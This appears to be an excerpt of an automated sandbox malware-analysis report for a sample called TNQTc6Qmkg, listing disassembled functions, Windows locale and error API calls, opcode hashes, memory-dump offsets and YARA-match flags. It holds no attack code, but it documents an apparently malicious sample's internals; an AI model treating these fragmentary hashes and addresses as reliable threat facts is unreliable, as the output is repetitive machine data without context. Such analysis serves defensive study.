                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                                                        • Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                        • Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
                                                                                                                                                        • Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                        • Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                        • Instruction ID: 2116a261062f139c2ed6a3052d8727b877e6f44aa7b8d814d88c90b3b805de04
                                                                                                                                                        • Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                        • Instruction Fuzzy Hash: 50022C75E012199FDF14CFA9D884BAEB7F1FF88314F25816AD819E7284D731AA41CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: @$@
                                                                                                                                                        • API String ID: 0-149943524
                                                                                                                                                        • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                        • Instruction ID: 5ac474f401ff84d65a7c00b8ab40d9ec956735ab5d828acb833d15ba63f7450e
                                                                                                                                                        • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                        • Instruction Fuzzy Hash: 53318E3A34C1864BC355C73DD8B45F2B781FAC6130B2D8BF9D2828F24AD2A69E46D700
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: @$@
                                                                                                                                                        • API String ID: 0-149943524
                                                                                                                                                        • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                        • Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
                                                                                                                                                        • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                        • Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05D0B984,00000000,?,00000008,?,?,05D13766,00000000), ref: 05D0BBB6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                        • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                        • Instruction ID: a7f4f3467a68bfd87bc73f99087a33569a130117feb8e7a57074538f485f21eb
                                                                                                                                                        • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                        • Instruction Fuzzy Hash: F6B159316186088FE715CF28C48AB697BE1FF04365F29965AE8DACF2E1C735D981CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                        • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                        • Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
                                                                                                                                                        • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                        • Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05D10829
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                        • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                        • Instruction ID: 65949ae6c3975571c3180a52f693a315f800330f0346ec938dd776e8672bbbff
                                                                                                                                                        • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                        • Instruction Fuzzy Hash: 6821C47261420AABDB24BA64EC48F7A77A8EB40310F00017BED05C6180EB34D984CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                        • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                        • Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
                                                                                                                                                        • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                        • Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05D104CF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                        • Instruction ID: 32d17ad429b821eb3b5254568d795f10feede76321cb620d20f35986bf6bdee7
                                                                                                                                                        • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                        • Instruction Fuzzy Hash: 25114C376003019FDB18AF39E8D8A7AB792FF84358B54443EED8647A40D771B582C740
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                        • Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
                                                                                                                                                        • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                        • Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05D107A3,00000000,00000000,?), ref: 05D10A31
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                        • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                        • Instruction ID: 6b11f7735feb36966b30c6be84678f58e5ae476903c157f31f733d9032311e5a
                                                                                                                                                        • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                        • Instruction Fuzzy Hash: A7F0F932A11115BFDB24EA249C0DBBA776DFB40654F04046AED0AA3140EA74FE81C7D8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                        • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                        • Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
                                                                                                                                                        • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                        • Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05D10829
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                        • Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                        • Instruction ID: a95b91bc4a97b23d1d9e753169f4f388c5f3ba8bf10227604ec349dd0bb7ea49
                                                                                                                                                        • Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                        • Instruction Fuzzy Hash: F1F0A932755109ABDB14BF64DC49EBA77ACDB44310F0001BAE906D7240DE74AD45C7E5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05D10544
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                        • Instruction ID: 80ffd63348a3a6a82cf15b2c42190f0166e80dc5f9c853428a3101c3100b7a70
                                                                                                                                                        • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                        • Instruction Fuzzy Hash: 6DF0C8363003056FEB24AF39AC88A7A7B95FF81758F15446EFD468B540D671D881CA54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                        • Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
                                                                                                                                                        • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                        • Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05D04002,?,00000004), ref: 05D0779E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                        • Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                        • Instruction ID: b9513032cb68961f1714f541812cfd3d97ac31708da18c86bac8fccc596a3e24
                                                                                                                                                        • Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                        • Instruction Fuzzy Hash: 63F0F031B40218BBDF11AF60EC05F7E3B62EF44B10F90007AFC092A2A0CA719E209699
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D01C62: RtlEnterCriticalSection.NTDLL(?), ref: 05D01C71
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05D07390
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                        • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                        • Instruction ID: 8ac4b28a8f6bb4b809cb723afb3773399d2073cb508bfb904288076bd3fa5f9e
                                                                                                                                                        • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                        • Instruction Fuzzy Hash: 56F04F36A50304AFEB14EF68DC49B5D77F0EB04724F10512AF514DB2E0CB7499449B49
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                        • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                        • Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
                                                                                                                                                        • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                        • Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05D10449
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                        • Instruction ID: 79c9a37e7464e780d9af9615a6c715c67a6e9966fb354fc9959ee5051ddf3662
                                                                                                                                                        • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                        • Instruction Fuzzy Hash: 0EF05C3530020557CB04AF35EC49B7A7F91FFC1714B46405AEE058B140C6319842C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                        • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
